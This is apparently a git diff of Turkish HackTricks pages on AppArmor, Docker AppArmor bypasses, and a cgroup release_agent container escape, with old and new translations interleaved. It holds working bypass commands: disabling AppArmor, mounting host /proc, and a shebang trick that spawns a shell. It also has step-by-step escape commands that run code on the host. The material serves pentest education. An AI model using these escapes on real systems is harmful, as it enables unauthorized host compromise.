AppArmor, **programlara program profilleri aracılığıyla sunulan kaynakları kısıtlamayı amaçlayan bir çekirdek geliştirmesidir**, erişim kontrol özelliklerini doğrudan kullanıcılara değil programlara bağlayarak Zorunlu Erişim Kontrolü (MAC) uygulamaktadır. Bu sistem, genellikle önyükleme sırasında, profilleri çekirdeğe yükleyerek çalışır ve bu profiller bir programın erişebileceği kaynakları, ağ bağlantılarını, ham soket erişimini ve dosya izinlerini belirler.
|
||||
|
||||
AppArmor profilleri için iki işletim modu vardır:
|
||||
AppArmor profilleri için iki işletim modu bulunmaktadır:
|
||||
|
||||
- **Uygulama Modu**: Bu mod, profilde tanımlanan politikaları aktif olarak uygular, bu politikalara aykırı hareketleri engeller ve syslog veya auditd gibi sistemler aracılığıyla bunları ihlal etmeye yönelik girişimleri kaydeder.
|
||||
- **Şikayet Modu**: Uygulama modunun aksine, şikayet modu, profilin politikalarına aykırı hareketleri engellemez. Bunun yerine, bu girişimleri kısıtlamaları uygulamadan politika ihlalleri olarak kaydeder.
|
||||
|
@ -41,12 +41,12 @@ AppArmor profilleri için iki işletim modu vardır:
|
|||
|
||||
- **Çekirdek Modülü**: Politikaların uygulanmasından sorumludur.
|
||||
- **Politikalar**: Program davranışı ve kaynak erişimi için kuralları ve kısıtlamaları belirtir.
|
||||
- **Ayrıştırıcı**: Politikaları çekirdeğe yükleme veya raporlama işlevini yerine getirir.
|
||||
- **Ayrıştırıcı**: Politikaları çekirdeğe yükler ve uygular veya raporlar.
|
||||
- **Araçlar**: AppArmor ile etkileşimde bulunmak ve yönetmek için bir arayüz sağlayan kullanıcı modu programlarıdır.
|
||||
|
||||
### Profil Yolu
|
||||
|
||||
Apparmor profilleri genellikle _**/etc/apparmor.d/**_ klasöründe saklanır. `sudo aa-status` komutuyla kısıtlanan ikili dosyaları listeleyebilirsiniz. Listelenen her ikili dosyanın yolundaki "/" karakterini bir noktaya değiştirirseniz, bahsedilen klasördeki apparmor profilinin adını elde edersiniz.
|
||||
Apparmor profilleri genellikle _**/etc/apparmor.d/**_ dizininde saklanır. `sudo aa-status` komutu ile kısıtlanan ikili dosyaları listeleyebilirsiniz. Listelenen her ikili dosyanın yolundaki "/" karakterini bir noktaya değiştirirseniz, bahsedilen klasördeki apparmor profilinin adını elde edersiniz.
|
||||
|
||||
Örneğin, _/usr/bin/man_ için bir **apparmor** profili _/etc/apparmor.d/usr.bin.man_ konumunda olacaktır.
|
||||
|
||||
|
@ -62,23 +62,23 @@ aa-mergeprof #used to merge the policies
|
|||
```
|
||||
## Profil Oluşturma
|
||||
|
||||
- Etkilenen yürütülebilir dosyayı belirtmek için **mutlak yol ve joker karakterleri** (dosya globbing için) kullanılabilir.
|
||||
- **Dosyalar** üzerinde yürütülecek erişimi belirtmek için aşağıdaki **erişim kontrolleri** kullanılabilir:
|
||||
- **r** (okuma)
|
||||
- **w** (yazma)
|
||||
- **m** (bellek haritası olarak yürütme)
|
||||
- **k** (dosya kilitleme)
|
||||
- **l** (sert bağlantı oluşturma)
|
||||
- **ix** (yeni programın politikayı devralarak başka bir programı yürütmesi)
|
||||
- **Px** (ortamı temizledikten sonra başka bir profil altında yürütme)
|
||||
- **Cx** (ortamı temizledikten sonra başka bir alt profil altında yürütme)
|
||||
- **Ux** (ortamı temizledikten sonra kısıtlamasız yürütme)
|
||||
- **Değişkenler** profillerde tanımlanabilir ve profilden dışarıdan manipüle edilebilir. Örneğin: @{PROC} ve @{HOME} (profil dosyasına #include \<tunables/global> ekleyin)
|
||||
- **İzin verme kurallarını geçersiz kılmak için reddetme kuralları desteklenir**.
|
||||
* Etkilenen yürütülebilir dosyayı belirtmek için **mutlak yol ve joker karakterleri** (dosya globbing için) kullanılabilir.
|
||||
* **Dosyalar** üzerinde yürütülecek erişimi belirtmek için aşağıdaki **erişim kontrolleri** kullanılabilir:
|
||||
* **r** (okuma)
|
||||
* **w** (yazma)
|
||||
* **m** (belleğe eşleme olarak yürütme)
|
||||
* **k** (dosya kilitleme)
|
||||
* **l** (sert bağlantı oluşturma)
|
||||
* **ix** (yeni programın politikayı devralarak başka bir programı yürütmesi için)
|
||||
* **Px** (ortamı temizledikten sonra başka bir profil altında yürütme)
|
||||
* **Cx** (ortamı temizledikten sonra başka bir çocuk profilinde yürütme)
|
||||
* **Ux** (ortamı temizledikten sonra kısıtsız yürütme)
|
||||
* **Değişkenler** profillerde tanımlanabilir ve profilden dışarıdan manipüle edilebilir. Örneğin: @{PROC} ve @{HOME} (profil dosyasına #include \<tunables/global> ekleyin)
|
||||
* **İzin verme kurallarını geçersiz kılmak için reddetme kuralları desteklenir**.
|
||||
|
||||
### aa-genprof
|
||||
|
||||
Profil oluşturmaya başlamak için apparmor size yardımcı olabilir. **Apparmor'un bir binary tarafından gerçekleştirilen eylemleri incelemesine ve ardından hangi eylemleri izin vermek veya reddetmek istediğinize karar vermenize izin vermesi mümkündür**.\
|
||||
Profil oluşturmaya başlamak için apparmor size yardımcı olabilir. **Bir bin tarafından gerçekleştirilen eylemleri incelemesine ve ardından hangi eylemleri izin vermek veya reddetmek istediğinize karar vermenize olanak tanır**.\
|
||||
Sadece şunu çalıştırmanız yeterlidir:
|
||||
```bash
|
||||
sudo aa-genprof /path/to/binary
|
||||
|
@ -87,15 +87,15 @@ Ardından, farklı bir konsolda genellikle ikili dosyanın gerçekleştireceği
|
|||
```bash
|
||||
/path/to/binary -a dosomething
|
||||
```
|
||||
Ardından, ilk konsolda "**s**" tuşuna basın ve kaydedilen eylemlerde ihmal etmek, izin vermek veya ne yapmak istediğinizi belirtin. İşiniz bittiğinde "**f**" tuşuna basın ve yeni profil _/etc/apparmor.d/path.to.binary_ dizininde oluşturulacaktır.
|
||||
Ardından, ilk konsolda "**s**" tuşuna basın ve ardından kaydedilen eylemlerde ihmal etmek, izin vermek veya ne yapmak istediğinizi belirtin. İşiniz bittiğinde "**f**" tuşuna basın ve yeni profil _/etc/apparmor.d/path.to.binary_ dizininde oluşturulacaktır.
|
||||
|
||||
{% hint style="info" %}
|
||||
Yön tuşları kullanarak izin vermek/engellemek/ne yapmak istediğinizi seçebilirsiniz.
|
||||
Yön tuşları kullanarak neyi izin vermek/engellemek/ihmal etmek istediğinizi seçebilirsiniz.
|
||||
{% endhint %}
|
||||
|
||||
### aa-easyprof
|
||||
|
||||
Ayrıca bir uygulamanın apparmor profil şablonunu şu şekilde oluşturabilirsiniz:
|
||||
Ayrıca, bir uygulamanın apparmor profil şablonunu şu şekilde oluşturabilirsiniz:
|
||||
```bash
|
||||
sudo aa-easyprof /path/to/binary
|
||||
# vim:syntax=apparmor
|
||||
|
@ -130,12 +130,12 @@ sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
|
|||
```
|
||||
### Günlüklerden bir profil değiştirme
|
||||
|
||||
Aşağıdaki araç, günlükleri okuyacak ve kullanıcıya tespit edilen yasaklanmış bazı eylemleri izin verip vermek istemediğini soracaktır:
|
||||
Aşağıdaki araç, günlükleri okuyacak ve kullanıcıya tespit edilen bazı yasaklanmış eylemleri izin verip vermek istemediğini soracaktır:
|
||||
```bash
|
||||
sudo aa-logprof
|
||||
```
|
||||
{% hint style="info" %}
|
||||
Ok tuşları kullanarak neyi izin vermek/engellemek/neyi olursa olsun seçebilirsiniz
|
||||
Ok tuşları kullanarak neyi izin vermek/engellemek/neyi yapmak istediğinizi seçebilirsiniz.
|
||||
{% endhint %}
|
||||
|
||||
### Profil Yönetimi
|
||||
|
@ -148,12 +148,12 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
|
|||
```
|
||||
## Günlükler
|
||||
|
||||
**`service_bin`** yürütülebilir dosyasının _/var/log/audit/audit.log_ dosyasındaki **AUDIT** ve **DENIED** günlük örneği:
|
||||
**`service_bin`** yürütülebilir dosyasının _/var/log/audit/audit.log_ dosyasındaki **AUDIT** ve **DENIED** günlüklerinden bir örnek:
|
||||
```bash
|
||||
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
|
||||
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
|
||||
```
|
||||
Aşağıdaki bilgilere şu şekilde de ulaşabilirsiniz:
|
||||
Ayrıca bu bilgilere şu şekilde de ulaşabilirsiniz:
|
||||
```bash
|
||||
sudo aa-notify -s 1 -v
|
||||
Profile: /bin/service_bin
|
||||
|
@ -173,7 +173,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
|
|||
```
|
||||
## Docker'da Apparmor
|
||||
|
||||
Docker'ın **docker-profile** profili varsayılan olarak nasıl yüklendiğine dikkat edin:
|
||||
Docker'ın **docker-profile** profili varsayılan olarak yüklendiğine dikkat edin:
|
||||
```bash
|
||||
sudo aa-status
|
||||
apparmor module is loaded.
|
||||
|
@ -193,14 +193,14 @@ Varsayılan olarak **Apparmor docker-default profil**'ü [https://github.com/mob
|
|||
|
||||
**docker-default profil Özeti**:
|
||||
|
||||
- Tüm **ağ erişimine** sahiptir
|
||||
- **Yetenek** tanımlanmamıştır (Ancak, bazı yetenekler temel kural dosyalarını içererek gelecektir, yani #include \<abstractions/base> )
|
||||
- Herhangi bir **/proc** dosyasına **yazma izni yoktur**
|
||||
- Tüm **ağa erişim**
|
||||
- **Yetenek** tanımlanmamıştır (Ancak, bazı yetenekler temel kural dosyalarını içererek gelecektir, yani #include \<abstractions/base>)
|
||||
- Herhangi bir **/proc** dosyasına **yazma izni yok**
|
||||
- Diğer /**proc** ve /**sys** alt dizinleri/**dosyaları** okuma/yazma/kilitleme/bağlantı/çalıştırma erişimine **izin verilmez**
|
||||
- **Bağlama** izni yoktur
|
||||
- **Ptrace** yalnızca **aynı apparmor profiline** sıkıştırılmış bir işlemde çalıştırılabilir
|
||||
- **Bağlama** izni yok
|
||||
- **Ptrace** yalnızca **aynı apparmor profil**i tarafından sınırlanmış bir işlemde çalıştırılabilir
|
||||
|
||||
Bir **docker konteyneri çalıştırdıktan** sonra aşağıdaki çıktıyı görmelisiniz:
|
||||
Bir **docker konteyneri çalıştırdığınızda** aşağıdaki çıktıyı görmelisiniz:
|
||||
```bash
|
||||
1 processes are in enforce mode.
|
||||
docker-default (825)
|
||||
|
@ -211,11 +211,11 @@ docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin
|
|||
echo "" > /proc/stat
|
||||
sh: 1: cannot create /proc/stat: Permission denied
|
||||
```
|
||||
Apparmor kısıtlamalarını atlamak için **apparmor'u devre dışı bırakmanız** gerekmektedir:
|
||||
Apparmor kısıtlamalarını atlamak için **apparmor'ı devre dışı bırakmanız** gerekmektedir:
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
|
||||
```
|
||||
Varsayılan olarak **AppArmor**, **konteynerin içinden klasör bağlamasını yasaklayacaktır** bile SYS\_ADMIN yeteneği ile.
|
||||
Varsayılan olarak **AppArmor**, **konteynerin içinden klasör bağlamasını yasaklar** bile olsa SYS\_ADMIN yeteneği ile.
|
||||
|
||||
Docker konteynerine **yetenekler ekleyebilir/çıkarabilirsiniz** (bu hala **AppArmor** ve **Seccomp** gibi koruma yöntemleri tarafından kısıtlanacaktır):
|
||||
|
||||
|
@ -224,18 +224,18 @@ Docker konteynerine **yetenekler ekleyebilir/çıkarabilirsiniz** (bu hala **App
|
|||
* `--cap-drop=ALL --cap-add=SYS_PTRACE` tüm yetenekleri kaldırır ve sadece `SYS_PTRACE` yeteneğini verir
|
||||
|
||||
{% hint style="info" %}
|
||||
Genellikle, bir **docker** konteyneri **içinde** bir **açık yeteneğin** bulunduğunu **fark ettiğinizde** ve **açığın bazı kısımlarının çalışmadığını gördüğünüzde**, bunun nedeni docker **apparmor'ın bunu engelliyor olması** olacaktır.
|
||||
Genellikle, bir **docker** konteyneri **içinde** bir **açık yeteneğin** mevcut olduğunu **fark ederseniz** ancak **saldırının bazı kısımları çalışmıyorsa**, bu genellikle docker **apparmor'ın bunu engellediği** anlamına gelir.
|
||||
{% endhint %}
|
||||
|
||||
### Örnek
|
||||
|
||||
(Örnek [**buradan**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) alınmıştır)
|
||||
|
||||
AppArmor işlevselliğini göstermek için, aşağıdaki satırı eklediğim yeni bir Docker profilı olan "mydocker"ı oluşturdum:
|
||||
AppArmor işlevselliğini göstermek için, aşağıdaki satırı eklediğim yeni bir Docker profil "mydocker" oluşturdum:
|
||||
```
|
||||
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
|
||||
```
|
||||
Profili etkinleştirmek için aşağıdakileri yapmamız gerekiyor:
|
||||
Profil'i etkinleştirmek için aşağıdakileri yapmamız gerekiyor:
|
||||
```
|
||||
sudo apparmor_parser -r -W mydocker
|
||||
```
|
||||
|
@ -244,7 +244,7 @@ Profilleri listelemek için aşağıdaki komutu kullanabiliriz. Aşağıdaki kom
|
|||
$ sudo apparmor_status | grep mydocker
|
||||
mydocker
|
||||
```
|
||||
Aşağıda gösterildiği gibi, "AppArmor" profili "/etc/" dizinine yazma erişimini engellediği için "etc/" dizinini değiştirmeye çalıştığımızda hata alırız.
|
||||
Aşağıda gösterildiği gibi, "AppArmor" profili "/etc/" dizinine yazma erişimini engellediği için " /etc/" dizinini değiştirmeye çalıştığımızda hata alırız.
|
||||
```
|
||||
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
|
||||
chmod: /etc/hostname: Permission denied
|
||||
|
@ -257,19 +257,19 @@ docker inspect 9d622d73a614 | grep lowpriv
|
|||
"AppArmorProfile": "lowpriv",
|
||||
"apparmor=lowpriv"
|
||||
```
|
||||
Ardından, kullanılan tam profilini bulmak için aşağıdaki satırı çalıştırabilirsiniz:
|
||||
Ardından, kullanılan tam profil **bulmak için aşağıdaki satırı çalıştırabilirsiniz**:
|
||||
```bash
|
||||
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
||||
```
|
||||
### AppArmor Docker Bypass2
|
||||
|
||||
Eğer **apparmor docker profilini değiştirebilir ve yeniden yükleyebilirseniz** tuhaf bir durumda. Kısıtlamaları kaldırabilir ve onları "atlayabilirsiniz".
|
||||
Eğer **apparmor docker profilini değiştirebilir ve yeniden yükleyebilirseniz.** Kısıtlamaları kaldırabilir ve onları "atlayabilirsiniz."
|
||||
|
||||
**AppArmor, yol tabanlıdır**, bu da demektir ki eğer **bir dizin içindeki dosyaları koruyorsa** bile **`/proc`** gibi, eğer **konteynerin nasıl çalıştırılacağını yapılandırabilirseniz**, ana bilgisayarın proc dizinini **`/host/proc`** içine bağlayabilir ve artık **AppArmor tarafından korunmaz**.
|
||||
**AppArmor, yol tabanlıdır**, bu da demektir ki eğer **bir dizin içindeki dosyaları koruyorsa** bile **`/proc`** gibi, eğer **konteynerin nasıl çalıştırılacağını yapılandırabilirseniz**, **ana bilgisayarın proc dizinini** **`/host/proc`** içine bağlayabilir ve artık **AppArmor tarafından korunmayacaktır**.
|
||||
|
||||
### AppArmor Shebang Atlatma
|
||||
|
||||
Bu [**bu hata**](https://bugs.launchpad.net/apparmor/+bug/1911431)da, **belirli kaynaklarla perl'in çalışmasını engelliyorsanız bile**, sadece bir kabuk betiği oluşturursanız ve ilk satırda **`#!/usr/bin/perl`** belirtirseniz ve dosyayı **doğrudan çalıştırırsanız**, istediğinizi çalıştırabilirsiniz. Örn.:
|
||||
Bu [**bu hata**](https://bugs.launchpad.net/apparmor/+bug/1911431) örneğinde **belirli kaynaklarla perl'in çalışmasını engelliyorsanız bile**, eğer sadece bir kabuk betiği oluşturursanız ve ilk satırda **`#!/usr/bin/perl`** belirtirseniz ve dosyayı **doğrudan çalıştırırsanız**, istediğinizi çalıştırabilirsiniz. Örn.:
|
||||
```perl
|
||||
echo '#!/usr/bin/perl
|
||||
use POSIX qw(strftime);
|
||||
|
@ -279,28 +279,28 @@ exec "/bin/sh"' > /tmp/test.pl
|
|||
chmod +x /tmp/test.pl
|
||||
/tmp/test.pl
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılım saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin</summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na](https://github.com/sponsors/carlospolop) göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,17 +6,17 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**]'ni edinin (https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'ler**] koleksiyonumuz (https://opensea.io/collection/the-peass-family)
|
||||
* **Katılın** 💬 [**Discord grubuna**] (https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**] veya bizi **Twitter** 🐦 [**@carlospolopm**] (https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**] (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**] (https://github.com/carlospolop/hacktricks-cloud) github depolarına.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
|
@ -38,8 +38,8 @@ $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
|
|||
```
|
||||
**Kavram Kanıtı (PoC)**, cgroups'ı sömürmek için bir yöntemi gösterir. Bu, `release_agent` dosyası oluşturarak ve çağrısını tetikleyerek konteyner ana bilgisayarında keyfi komutları yürütmek için kullanılır. İşte dahil olan adımların ayrıntıları:
|
||||
|
||||
1. **Ortamı Hazırlama:**
|
||||
- `cgrp` adlı bir dizin oluşturulur ve cgroup için bir bağlama noktası olarak hizmet verir.
|
||||
1. **Ortamı Hazırla:**
|
||||
- `cgroup` için bir bağlantı noktası olarak hizmet verecek `/tmp/cgrp` adlı bir dizin oluşturulur.
|
||||
- RDMA cgroup denetleyicisi bu dizine bağlanır. RDMA denetleyicisinin bulunmaması durumunda, alternatif olarak `memory` cgroup denetleyicisinin kullanılması önerilir.
|
||||
```shell
|
||||
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||
|
@ -51,32 +51,32 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
|||
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||
```
|
||||
3. **Yayın Ajanını Yapılandır:**
|
||||
- Konteynerin ana bilgisayardaki yolu /etc/mtab dosyasından elde edilir.
|
||||
- Ardından cgroup'un release_agent dosyası, elde edilen ana bilgisayar yolunda bulunan /cmd adlı bir betiği çalıştırmak üzere yapılandırılır.
|
||||
- Konteynerin ana bilgisayar üzerindeki yolu /etc/mtab dosyasından elde edilir.
|
||||
- Ardından cgroup'un release_agent dosyası, elde edilen ana bilgisayar yolunda bulunan /cmd adlı bir betiği çalıştırmak üzere yapılandırılır.
|
||||
```shell
|
||||
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||
```
|
||||
4. **/cmd Betiği Oluşturun ve Yapılandırın:**
|
||||
- /cmd betiği konteyner içinde oluşturulur ve ps aux komutunu çalıştırmak üzere yapılandırılır, çıktı /output adlı bir dosyaya yönlendirilir. Ana makinedeki /output dosyasının tam yolu belirtilir.
|
||||
- /cmd betiği konteyner içinde oluşturulur ve ps aux komutunu çalıştırmak üzere yapılandırılır, çıktı /output adlı bir dosyaya yönlendirilir. Ana bilgisayar üzerindeki /output'un tam yolu belirtilir.
|
||||
```shell
|
||||
echo '#!/bin/sh' > /cmd
|
||||
echo "ps aux > $host_path/output" >> /cmd
|
||||
chmod a+x /cmd
|
||||
```
|
||||
5. **Saldırıyı Tetikle:**
|
||||
- Bir işlem "x" çocuk cgroups içinde başlatılır ve hemen sonlandırılır.
|
||||
- Bir işlem "x" çocuk cgroup içinde başlatılır ve hemen sonlandırılır.
|
||||
- Bu, `release_agent` (the /cmd script) tetikler ve ana bilgisayarda ps aux komutunu çalıştırır ve çıktıyı konteyner içinde /output'a yazar.
|
||||
```shell
|
||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -84,14 +84,14 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin</summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimizi**](https://opensea.io/collection/the-peass-family) görün
|
||||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,21 +6,21 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
